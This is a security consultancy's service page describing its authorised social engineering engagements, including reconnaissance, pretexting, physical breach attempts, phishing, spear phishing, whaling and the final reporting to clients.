It is widely accepted that one of the greatest threats to security is the human element. Enterprises quite rightly invest huge sums in developing secure architectures and deploying secure networks and devices, but fail to sufficiently educate their staff when it comes to security best practices. It is very rarely given sufficient attention beyond an annual security awareness email. Internal security awareness programs are recommended, and effective. However, often their effectiveness only lasts for a short period after - and soon old habits creep back in.
Social engineering offers a way to demonstrate to the business what can result from not paying enough attention to keeping security fresh on employee minds. Social engineering involves attempting to take advantage of any weakness in security – whether this be physical security such as a server room door being left ajar, or cyber security when a staff member opens a phishing e-mail.
Social engineering engagements can be scoped to be as extensive as the client is comfortable with. They can range from purely remote investigations to determine what can be obtained about and from the organisation, to attempts at breaking into the client premises and gaining access to their internal network or secret files. All boundaries are agreed with the client beforehand.
Physical social engineering
A typical social engineering engagement will begin with reconnaissance against the client corporation. This phase is designed to collect as much information as possible to allow the consultants to create a convincing pretext. The reconnaissance involves researching employees, open roles, software used by the company, or anything that may allow the consultant to gain access to information. For social engineering engagements where a physical breach is requested by the client, the consultant will use this phase to research the client offices using open source tools and in person investigation.
The engagement will then proceed into the exploitation phase, where the consultants will begin their attempts to gain sensitive information or physical access to the client offices. Consultants may pretend to work for the client, work for a utilities company, or any other convincing pretext in this phase.
Cyber social engineering
Phishing testing is typically externally (Internet-based). However, in some rare cases (usually by client request.) the testing can be conducted internally.
The typical aim of any Phishing engagement is to leverage staff in order to obtain highly-privileged access to the target network through the use of malicious E-Mails. Phishing will usually start with Open Source Intelligence and developing a pretext.
Open Source Intelligence (OSINT) is the use of the internet to gain information about a target, such as Employee names, contact information, internal documents and anything else that may prove useful to an attacker.
Then a pretext will be developed, this is the story used to justify the next stage of the test. Depending on what type of test has been chosen. For Phishing exercises, this may involve trawling news sites for information regarding the target company or scanning target company websites for login forms that could be used to create realistic looking login pages.
Finally, a phishing server will be created to harvest the credentials. This server can be hosted in the Cloud, on ProCheckUp hardware or in rare cases, on client Infrastructure if required. Connections to this server will be encrypted and the data securely deleted once the test has been conducted.
Phishing engagements will then usually consist of one or more of the following tests.
Phishing consists of sending E-Mails to members of an organisation in an attempt to gain credentials or install malware to the target organisation. Targets can be provided by the client, or in most cases provided by the client directly.
Spear Phishing is an exercise specifically targeted at a particular department. (Generally speaking, this will usually be the IT Department or Helpdesk as those users will have elevated privileges.)
Whaling is phishing exercise targeted at a single high value target. (Or “Whale”) These can include the Company CEO or other high-ranking board members. These people are usually targeted due to the access that their job entails, or having access to company financial information.
Social Engineering Reporting
Once an engagement has been completed, the consultants will create a final deliverable consisting of a technical and management-level report. The final report will include details of all compromises, recommendations, and evidences. In cases where consultants have successfully compromised data, security awareness training can be delivered to the client.
Please contact us for more information on how ProCheckUp Social Engineering Services can help you.